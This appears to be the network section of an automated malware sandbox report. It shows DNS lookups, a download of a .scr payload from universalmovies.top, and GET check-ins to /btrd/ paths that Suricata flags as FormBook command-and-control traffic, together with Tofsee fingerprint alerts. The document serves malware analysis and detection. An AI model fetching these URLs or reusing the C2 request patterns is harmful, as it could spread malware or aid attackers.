Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| www.h7wlvwr4afx.top | ||
| www.xmentorgroup.com |
CNAME
xmentorgroup.com
|
3.33.130.190 |
| www.home-repair-contractors-kfm.xyz | 199.59.243.226 | |
| www.liposuctionclinics2.today | 104.21.89.233 | |
| universalmovies.top | 172.67.162.95 |
- UDP Requests
-
-
192.168.56.101:53004 164.124.101.2:53
-
192.168.56.101:53850 164.124.101.2:53
-
192.168.56.101:54148 164.124.101.2:53
-
192.168.56.101:54883 164.124.101.2:53
-
192.168.56.101:55146 164.124.101.2:53
-
192.168.56.101:59002 164.124.101.2:53
-
192.168.56.101:61950 164.124.101.2:53
-
192.168.56.101:137 192.168.56.103:137
-
192.168.56.101:137 192.168.56.255:137
-
192.168.56.101:138 192.168.56.255:138
-
192.168.56.101:53853 239.255.255.250:1900
-
52.231.114.183:123 192.168.56.101:123
-
GET
200
https://universalmovies.top/nelb.scr
REQUEST
RESPONSE
BODY
GET /nelb.scr HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C; .NET4.0E)
Host: universalmovies.top
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Wed, 26 Jun 2024 01:10:18 GMT
Content-Type: application/x-silverlight
Content-Length: 591360
Connection: keep-alive
Last-Modified: Wed, 26 Jun 2024 00:07:23 GMT
ETag: "90600-61bbfcc76a572"
Accept-Ranges: bytes
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XpkYYkMjFVzuu%2BMw2tv0Rq%2FRFfTwHEDpZQV8gdJ5bhfVDOvazvKMV2FKVkTrvgO7feKIhM8%2ByQFSBo2kZ%2Bg7aD04UaBLIvtehSG7MyBBrcSTuMcF5jiMeBjIMfb%2B56u4NPkbV4Gk"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=0; includeSubDomains; preload
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 8999511d885d090c-LAX
alt-svc: h3=":443"; ma=86400
GET
301
http://www.liposuctionclinics2.today/btrd/?FrJX9P9=g2Awi9gzMhKdCQNLs5BlCrpPGRTrEfCXfESYZTVa1wMirmNXITW5sw9ZqEJh6Ao16UcXSiJC&Vnt4_=-Z1l70lHPdrDeba
REQUEST
RESPONSE
BODY
GET /btrd/?FrJX9P9=g2Awi9gzMhKdCQNLs5BlCrpPGRTrEfCXfESYZTVa1wMirmNXITW5sw9ZqEJh6Ao16UcXSiJC&Vnt4_=-Z1l70lHPdrDeba HTTP/1.1
Host: www.liposuctionclinics2.today
Connection: close
HTTP/1.1 301 Moved Permanently
Date: Wed, 26 Jun 2024 01:10:52 GMT
Content-Type: text/html
Content-Length: 167
Connection: close
Cache-Control: max-age=3600
Expires: Wed, 26 Jun 2024 02:10:52 GMT
Location: https://www.liposuctionclinics2.today/btrd/?FrJX9P9=g2Awi9gzMhKdCQNLs5BlCrpPGRTrEfCXfESYZTVa1wMirmNXITW5sw9ZqEJh6Ao16UcXSiJC&Vnt4_=-Z1l70lHPdrDeba
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5TnY4m990gnmicU2JuFNts2Oobe6rce9iAr0L1LOvLlU%2FbzZH%2Bd9fQ0b3Yk%2B%2F2m1ohtJDW6KCbvmuyahGBJcKKk%2Bu5oIAgwsK9UpEMVgirSodbxQmxB8vmmaYAJ%2F7z0a%2BX3dwysGQFA6aBpTb0xGnw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 899951f37e787cf5-LAX
alt-svc: h3=":443"; ma=86400
GET
200
http://www.home-repair-contractors-kfm.xyz/btrd/?FrJX9P9=eVMlJIJ59eHiVvLGCrdtG7xbZNorDbW6x7q4JZ9YU9WFmkuuB+jImPCwzZVcR1MIE594ENWI&Vnt4_=-Z1l70lHPdrDeba
REQUEST
RESPONSE
BODY
GET /btrd/?FrJX9P9=eVMlJIJ59eHiVvLGCrdtG7xbZNorDbW6x7q4JZ9YU9WFmkuuB+jImPCwzZVcR1MIE594ENWI&Vnt4_=-Z1l70lHPdrDeba HTTP/1.1
Host: www.home-repair-contractors-kfm.xyz
Connection: close
HTTP/1.1 200 OK
date: Wed, 26 Jun 2024 01:11:13 GMT
content-type: text/html; charset=utf-8
content-length: 1402
x-request-id: 4b409a36-d68a-4e60-ae40-0b4fbd2cc9d4
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_C2AIsxAFFiV0gcsDd0JqVHfZg1Co+Sv2NwsaHdJRG4mZnJcLt54erwEW/1ZJgI9xQ7TOick9LbA97ibozdIvTw==
set-cookie: parking_session=4b409a36-d68a-4e60-ae40-0b4fbd2cc9d4; expires=Wed, 26 Jun 2024 01:26:13 GMT; path=/
connection: close
GET
200
http://www.xmentorgroup.com/btrd/?FrJX9P9=UYDnSobXWpXBVkfD89bcJt5KVoSCT9YF2HTPLZC4vkf0xFVelZyjEGpv0zxgTtsO2BXFiI/y&Vnt4_=-Z1l70lHPdrDeba
REQUEST
RESPONSE
BODY
GET /btrd/?FrJX9P9=UYDnSobXWpXBVkfD89bcJt5KVoSCT9YF2HTPLZC4vkf0xFVelZyjEGpv0zxgTtsO2BXFiI/y&Vnt4_=-Z1l70lHPdrDeba HTTP/1.1
Host: www.xmentorgroup.com
Connection: close
HTTP/1.1 200 OK
Server: openresty
Date: Wed, 26 Jun 2024 01:12:12 GMT
Content-Type: text/html
Content-Length: 217
Connection: close
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
| Flow | SID | Signature | Category |
|---|---|---|---|
| UDP 192.168.56.101:53004 -> 164.124.101.2:53 | 2023883 | ET DNS Query to a *.top domain - Likely Hostile | Potentially Bad Traffic |
| UDP 192.168.56.101:61950 -> 164.124.101.2:53 | 2023883 | ET DNS Query to a *.top domain - Likely Hostile | Potentially Bad Traffic |
| TCP 192.168.56.101:49163 -> 104.21.74.191:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
| TCP 192.168.56.101:49170 -> 172.67.148.235:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
| TCP 192.168.56.101:49172 -> 3.33.130.190:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
| TCP 192.168.56.101:49171 -> 199.59.243.226:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
| TCP 192.168.56.101:49171 -> 199.59.243.226:80 | 2031088 | ET HUNTING Request to .XYZ Domain with Minimal Headers | Potentially Bad Traffic |
Suricata TLS
| Flow | Issuer | Subject | Fingerprint |
|---|---|---|---|
|
TLSv1 192.168.56.101:49163 104.21.74.191:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 | CN=universalmovies.top | 67:bc:42:10:14:49:13:d3:52:bc:a7:fb:fc:bd:0e:1c:24:be:f9:a6 |
Snort Alerts
No Snort Alerts